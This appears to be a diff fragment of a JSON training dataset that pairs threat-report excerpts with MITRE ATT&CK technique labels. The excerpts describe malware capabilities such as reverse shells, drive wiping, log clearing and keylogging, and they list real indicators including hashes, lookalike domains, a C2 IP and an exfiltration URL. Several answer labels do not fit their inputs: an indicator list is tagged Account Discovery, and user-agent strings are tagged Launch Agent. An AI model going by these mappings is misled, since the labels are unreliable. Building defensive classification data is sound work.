real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "A string with the 5-character length and encoded with BASE64 is added to the beginning of the buffer encoded using the BASE64 algorithm", + "output": "- T1132: Data Encoding\n- T1027: Obfuscated Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Attack Flow and Exfiltration After injecting into the targeted processes, the modules continue their malicious activity through those processes", + "output": "- T1055: Process Injection\n- T1057: Process Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "AutoFocus customers may learn more from the DarkHydrus tag IOC Related SHA256 Hashes Payloads cec36e8ed65ac6f250c05b4a17c09f58bb80c19b73169aaf40fa15c8d3a9a6a1 ac7f9c536153780ccbec949f23b86f3d16e3105a5f14bb667df752aa815b0dc4 a547a02eb4fcb8f446da9b50838503de0d46f9bb2fd197c9ff63021243ea6d88 d428d79f58425d831c2ee0a73f04749715e8c4dd30ccd81d92fe17485e6dfcda dd2625388bb2d2b02b6c10d4ee78f68a918b25ddd712a0862bcf92fa64284ffa b2571e3b4afbce56da8faa726b726eb465f2e5e5ed74cf3b172b5dd80460ad81 c8b3d4b6acce6b6655e17255ef7a214651b7fc4e43f9964df24556343393a1a3 ce84b3c7986e6a48ca3171e703e7083e769e9ced1bbdd7edf8f3eab7ce20fd00 99541ab28fc3328e25723607df4b0d9ea0a1af31b58e2da07eff9f15c4e6565c Delivery documents d393349a4ad00902e3d415b622cf27987a0170a786ca3a1f991a521bff645318 8063c3f134f4413b793dfc05f035b6480aa1636996e8ac4b94646292a5f87fde 9eac37a5c675cd1750cd50b01fc05085ce0092a19ba97026292a60b11b45bf49 cf9b2b40ac621aaf3241ff570bd7a238f6402102c29e4fbba3c5ce0cb8bc25f9 0a3d5b2a8ed60e0d96d5f0d9d6e00cd6ab882863afbb951f10c395a3d991fbc1 0b1d5e17443f0896c959d22fa15dadcae5ab083a35b3ff6cb48c7f967649ec82 870c8b29be2b596cc2e33045ec48c80251e668abd736cef9c5449df16cf2d3b8 ff0b59f23630f4a854448b82f1f0cd66bc4b1124a3f49f0aecaca28309673cb0 01fd7992aa71f4dca3a3766c438fbabe9aea78ca5812ab75b5371b48bd2625e2 6dcb3492a45a08127f9816a1b9e195de2bb7e0731c4e7168392d0e8068adae7a 47b8ad55b66cdcd78d972d6df5338b2e32c91af0a666531baf1621d2786e7870 776c056096f0e73898723c0807269bc299ae3bbd8e9542f0a1cbba0fd3470cb4 cf7863e023475d695c6f72c471d314b8b1781c6e9087ff4d70118b30205da5f0 e88045931b9d99511ce71cc94f2e3d1159581e5eb26d4e05146749e1620dc678 26e641a9149ff86759c317b57229f59ac48c5968846813cafb3c4e87c774e245 b5cfaac25d87a6e8ebabc918facce491788863f120371c9d00009d78b6a8c350 ad3fd1571277c7ce93dfbd58cee3b3bec84eeaf6bb29a279ecb6a656028f771c Related Domains maccaffe[.]com cisc0[.]net 0utl00k[.]net msdncss[.]com 0ffice[.]com 0ffiice[.]com micrrosoft[.]net anyconnect[.]stream bigip[.]stream fortiweb[.]download kaspersky[.]science microtik[.]stream owa365[.]bid symanteclive[.]download windowsdefender[.]win allexa[.]net kaspersky[.]host hotmai1[.]com 0utlook[.]bid", + "output": "- T1087: Account Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Backdoor.Remexi, one of the malware in use by Chafer, had the following \u00a0command and control\u00a0host: 87pqxz159.dockerjsbin[.]com Interestingly, IP address \u00a083.142.230.138, which\u00a0serve as a\u00a0command and control address for an OilRig related sample (3a5fcba80c1fd685c4b5085d9d474118), was pointed to by\u00a087pqxz159.dockerjsbin[.]com as well", + "output": "- T1016: System Network Configuration Discovery\n- T1102: Web Service" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The implant either fetches the user agent from Internet Explorer (using ObtainUserAgentAsString()) or uses a default user agent specified in the malware binary: Mozilla/5.0 (Windows NT 6.1; WOW64) Chrome/28.0.1500.95 Safari/537.36 Control Server Communications. The malware initiates communication with the control server by sending it an HTTP POST request with additional optional HTTP data.", + "output": "- T1048: Exfiltration Over Alternative Protocol\n- T1132: Data Encoding\n- T1036: Masquerading" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Based on the McAfee Advanced Threat Research team\u2019s analysis, we find multiple components from this operation are unique from a code perspective, even though the code is loosely based on previous versions of the SYSCON backdoor", + "output": "- T1027.001: Obfuscated Files or Information - Binary Padding\n- T1140: Deobfuscate/Decode Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "By using this method, it will copy itself into a running Internet Explorer process in order to avoid detection by running as an independent process", + "output": "- T1055: Process Injection\n- T1057: Process Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "C2 Command Purpose reboot Reboot the system using shutdown command shutdown Shut down the system using shutdown command clean Wipe the Drives, C:\\, D:\\, E:\\, F:\\ screenshot Take a screenshot of the System upload Encrypt and upload the information from the system excel Leverage Excel.Application COM object for code execution outlook Leverage Outlook.Application COM object for code execution risk Leverage DCOM object for code execution Conclusion This activity shows us that TEMP.Zagros stays up-to-date with the latest code execution and persistence mechanism techniques, and that they can quickly leverage these techniques to update their malware", + "output": "- T1106: Native API\n- T1113: Screen Capture\n- T1053.005: Scheduled Task/Job - Scheduled Task\n- T1082: System Information Discovery\n- T1140: Deobfuscate/Decode Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "ChromeUpdate.exe starts the file with \u201crundll32 cache.dll,ADB_Setup\u201d Cache.dll analysis Cache.dll was written in C/C++ and built with a Microsoft compiler", + "output": "- T1055: Process Injection\n- T1218.011: System Binary Proxy Execution - Rundll32" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Code is included to copy the clipboard, delete files, compress files, clear event logs, shut down the machine, and much more", + "output": "- T1115: Clipboard Data\n- T1070: Indicator Removal\n- T1070.004: Indicator Removal - File Deletion" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Command_Keylog_offline:\u00a0 Load into memory a dll that contains the function \u201cPluginMe\u201d.\u00a0 After researching and analyzing additional Gh0stRAT samples while trying to figure out what dll contains \u201cPluginMe\u201d, I found a DLL for keylogging (called Keylog.dll) in a Gh0stRAT 2.0 sample that exported \u201cPluginMe\u201d.\u00a0 Using that and a cross-comparison of another Gh0stRAT sample that I\u2019ve previously analyzed, I was able to determine that \u201cPluginMe\u201d is a offline keyboard manager", + "output": "- T1055: Process Injection\n- T1218.011: System Binary Proxy Execution - Rundll32\n- T1574.001: Hijack Execution Flow - DLL Search Order Hijacking\n- T1056: Input Capture\n- T1574.002: Hijack Execution Flow - DLL Side-Loading" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Command_Update_Server:\u00a0 This command passes the string \u201cGh0st Update\u201d to the malware sample before running the sample again.\u00a0 When the sample restarts, it detects the \u201cGh0st Update\u201d command line arg, and connects to the server in order to update the sample.\u00a0 Command_Clean_Event:\u00a0 This command locates and deletes all of the event logs on the system", + "output": "- T1059: Command and Scripting Interpreter\n- T1070: Indicator Removal\n- T1102: Web Service\n- T1070.004: Indicator Removal - File Deletion" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Command Description 0x31 Fingerprint System via WMI and Registry 0x32 Drop File and execute 0x33 Remote Shell 0x34 Terminate connection with C2 0x35 Download and run batch script 0x36 Download file on machine 0x37 Upload File Table 2: FELIXROOT backdoor commands Figure 9 shows the log message decrypted from memory using the same mechanism shown in Figure 6 and Figure 7 for every command executed", + "output": "- T1064: Scripting\n- T1105: Ingress Tool Transfer" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Command Description Action 0 Server response string contains batch commands Execute batch commands and send results back to server 1 Server response string is a file path Check for file path and upload (PUT) the file to server 2 Server response string is a file path Check for file path and download (GET) the file Table 1: POWRUNER commands After successfully executing the command, POWRUNER sends the results back to the C2 server and stops execution", + "output": "- T1070.006: Indicator Removal - Timestomp\n- T1105: Ingress Tool Transfer\n- T1041: Exfiltration Over C2 Channel" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Command Functionality Init Create a reverse shell Write Write a file to the compromised system from the C2 server List List the files in a directory Upload Upload a file from the compromised system to the C2 server Table 2", + "output": "- T1105: Ingress Tool Transfer\n- T1041: Exfiltration Over C2 Channel" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Command IDDescription 0Uninstall Keydnap and quit 1Update the backdoor from a base64-encoded file 2Update the backdoor given a URL 3Decode and execute a base64-encoded file 4Decode and execute a base64-encoded Python script 5Download and execute a file from a URL 6Download and execute a Python script from a URL 7Execute a command and report the output back to the C&C server 8Request administrator privileges the next time the user runs an application 9Decode and execute, or stop, a base64-encoded file calledauthd_service The last two commands stand out", + "output": "- T1132: Data Encoding\n- T1140: Deobfuscate/Decode Files or Information\n- T1569.002: System Services - Service Execution" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Comnie will make requests to these URLs, looking for base64-encoded data after an identifier of \u2018magnet:/\u2019, as seen in the example below: Figure 14 GitHub storing Comnie C2 information In the example above, the C2 information is being stored within the user\u2019s URL parameter within GitHub", + "output": "- T1102: Web Service\n- T1041: Exfiltration Over C2 Channel" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Create processes Write responses from the control server to a file Send information for all drives Write data sent by the control server to a temporary file matching the file path pattern %temp%\\DWS00* Change the time of a file as specified by the control server The malware changing the file time", + "output": "- T1074: Data Staged\n- T1070.006: Indicator Removal - Timestomp\n- T1041: Exfiltration Over C2 Channel" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "cUpdateCheckers.bat is launched and creates a scheduled task for GoogleUpdateschecker.vbs persistence", + "output": "- T1064: Scripting\n- T1053.005: Scheduled Task/Job - Scheduled Task" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Cyber analysts are encouraged to review the information provided in this alert to detect signs of malicious network activity.Tools and capabilities used by HIDDEN COBRA actors include DDoS botnets, keyloggers, remote access tools (RATs), and wiper malware", + "output": "- T1518.001: Software Discovery - Security Software Discovery\n- T1018: Remote System Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Decrypted Config: C&C IP: 192.168.0.107 Port: 80 Sleep Timer: 30000 Campaign Identifier: Mirage If you look at it the decrypted configuration, you may notice that the IP being used for the C&C is an internal IP address", + "output": "- T1016: System Network Configuration Discovery\n- T1140: Deobfuscate/Decode Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Deletes the registry key HKCU\\Software\\Classes\\Applications\\rundll32.exe\\shell\\open Deletes the dropper components from the system", + "output": "- T1112: Modify Registry\n- T1070.004: Indicator Removal - File Deletion" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Different colors show the three dropped modules: legit app (blue), launcher (green), and decompressor with the Trojan embedded (red) The initial module drops three files that are typical for Chinese-speaking actors: a legit Symantec pcAnywhere (IntgStat.exe) for DLL side loading, a .dll launcher (pcalocalresloader.dll) and the last-stage decompressor (thumb.db)", + "output": "- T1055: Process Injection\n- T1574.002: Hijack Execution Flow - DLL Side-Loading" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Downloading stylesheets allows for emended JavaScript and VBS to be run from within them, at which point any type of malware could be staged and run quite easily", + "output": "- T1064: Scripting\n- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "During our investigation of one of the compromised servers we found an application that, at first glance, appeared to be a legitimate SSH server called Dropbear SSH", + "output": "- T1036: Masquerading\n- T1021: Remote Services" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "During the exfiltration process, the malware Base64-encodes the encrypted data and sends it to its control server using an HTTP POST request to the URL: http://ink[dot]inkboom.co.kr/host/img/jpg/post.php HTTP data/parameters used in the request include: Content-Type: multipart/form-data; boundary=\u2014-WebKitFormBoundar ywhpFxMBe19cSjFnG User Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; .NET CLR 1.1.4322) Accept-Language: en-us HTTP Version: HTTP/1.0 The malware can also download and execute additional components served to it by the control server", + "output": "- T1048: Exfiltration Over Alternative Protocol\n- T1071: Application Layer Protocol\n- T1132: Data Encoding\n- T1486: Data Encrypted for Impact" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "During the past few months, APT34 has been able to quickly incorporate exploits for at least two publicly vulnerabilities (CVE-2017-0199 and CVE-2017-11882) to target organizations in the Middle East", + "output": "- T1203: Exploitation for Client Execution\n- T1068: Exploitation for Privilege Escalation" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"Embed \"\"scriptlets\"\" in generated payloads to perform some tasks \"\"offline\"\" without needing network connectivity (ex: start keylogger, add persistence, execute custom python script, check_vm, etc.) Multiple Target Platforms: Platform Support Status Windows XP Supported Windows 7 Supported Windows 8 Supported Windows 10 Supported Linux Supported Mac OSX Limited Support Android Limited Support Documentation All documentation can be found on the wiki\"", + "output": "- T1106: Native API\n- T1010: Application Window Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Encoding the encryption key In order for the C&C server to decrypt the encrypted data, the randomly generated AES256 key must be included in the packet along with the encrypted data", + "output": "- T1573: Encrypted Channel\n- T1486: Data Encrypted for Impact" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Encrypted Configuration in shellcode The configuration information for the malware, including the C2 information are encrypted in the first shellcode blob and are passed as an argument to the DllMain function of the main PlugX DLL", + "output": "- T1082: System Information Discovery\n- T1140: Deobfuscate/Decode Files or Information\n- T1027: Obfuscated Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Escalate Privileges APT40 uses a mix of custom and publicly available credential harvesting tools to escalate privileges and dump password hashes", + "output": "- T1003: OS Credential Dumping\n- T1068: Exploitation for Privilege Escalation" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Examining the use of the unique user agents\u2019 strings over time shows that while previously only the Mozilla/5.0 user agent was in use, since mid 2017 all three user agent strings have been used by the Zebrocy tool for its C2 communications", + "output": "- T1543.001: Create or Modify System Process - Launch Agent\n- T1033: System Owner/User Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Exfiltration BRONZE UNION has also leveraged various web shells to collect and stage data for exfiltration", + "output": "- T1074: Data Staged\n- T1132: Data Encoding\n- T1505.003: Server Software Component - Web Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Figure 11: XML configuration file to schedule the task The Zyklon malware first retrieves the external IP address of the infected machine using the following: api.ipify[.]org ip.anysrc[.]net myexternalip[.]com whatsmyip[.]com The Zyklon executable contains another encrypted file in its .Net resource section named tor", + "output": "- T1027: Obfuscated Files or Information\n- T1036: Masquerading" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Figure 12: RSA public key 1 Figure 13: RSA public key 2 Figure 14: AES encryption parameters After encryption, the cipher text to be sent over C2 is Base64 encoded", + "output": "- T1573: Encrypted Channel" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Figure 13: Zyklon issuing \u201csettings\u201d command and subsequent server response Figure 14: Zyklon issuing \u201csign\u201d command and subsequent server response Figure 15: Zyklon issuing \u201cddos\u201d command and subsequent server response Plugin Manager Zyklon downloads number of plugins from its C2 server", + "output": "- T1016: System Network Configuration Discovery\n- T1105: Ingress Tool Transfer" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Figure 2: Textbox inside DOC The combined script from Word textbox drops the following components: \\Users\\[user_name]\\Intel\\58d2a83f7778d5.36783181.vbs \\Users\\[user_name]\\Intel\\58d2a83f777942.26535794.ps1 